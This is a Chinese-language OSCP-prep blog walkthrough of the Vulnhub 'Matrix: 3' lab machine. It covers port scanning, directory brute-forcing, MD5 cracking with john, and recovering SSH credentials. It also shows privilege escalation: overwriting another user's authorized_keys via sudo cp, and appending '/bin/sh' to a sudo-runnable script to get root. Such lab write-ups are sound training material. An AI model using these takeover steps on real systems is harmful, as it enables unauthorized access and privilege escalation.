OSCP备考_0x16_Vulnhub靶机_Matrix: 3

Ethan医生3个月前靶场100
名称说明
靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.183

arp-scan 192.168.233.1/24

image.png











nmap -p80,6464,7331 -A -T4 192.168.233.183

image.png

image.png


gobuster dir -u http://192.168.233.183 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png


扫描出来访问看看 遇到这种有啥door的 可以访问页面看看

image.png


http://192.168.233.183/Matrix/

image.png

好多文件夹,一个一个点太慢了 

wget -c -r -np -k -L -p http://192.168.233.183/Matrix/,直接递归下载

image.png

将目录下的index.html查看文件内的A标签全部打印出来

find /path/to/directory -type f -name "*.html" -exec grep -oP '<a\s+[^>]*>.*?</a>' {} \;

image.png

将挡案下载解压

image.png

后面那串应该是啥加密试试看是不是admin密码,密码就是passwd

john --wordlist=/usr/share/wordlists/rockyou.txt secret.txt --format=Raw-MD5

image.png

用来登入http://192.168.233.183:7331/ 试试看,果然登入了

image.png

image.png

http://192.168.233.183:7331/data/ 里面有个data下载下来


image.png

windows

Windows 通常會以 Unicode 寬字節的方式儲存,所以需要加參數 --encoding={b,l}

strings data --encoding={b,l}

image.png

前面有6464可以进行SSH登入 尝试看看7R1n17yN30

image.png

ssh guest@192.168.233.183 -p 6464 -t "bash --noprofile"

image.png

image.png

image.png

需要到trinity底下进行查看

OpenSSH_7.7p1, OpenSSL 1.0.2o  27 Mar 2018

发现可以使用ssh-keygen

然后去到trinity的用户目录下发现具有ssh

同时使用sudo -l发现可以通过sudo执行cp命令

那就用ssh覆盖,然后登录用户trinity

ssh-keygen

image.png

密钥生成成功

给执行权限chmod 777 trinity.pub

然后将公钥复制到trinity用户的ssh下的authorized_keys

sudo -u trinity /bin/cp trinity.pub /home/trinity/.ssh/authorized_keys

image.png

将私钥保存到本地

image.png

ssh -p 6464 trinity@192.168.233.183 -i id-rsa

image.png

sudo -l

echo '/bin/sh' >> oracle

chmod 777 oracle 

回到根目录 直接执行sudo /home/trinity/oracle

image.png

标签: OSCP

相关文章

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.73.179 (扫描TCP)nmap -sU --top-ports 100 10.129.73....

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。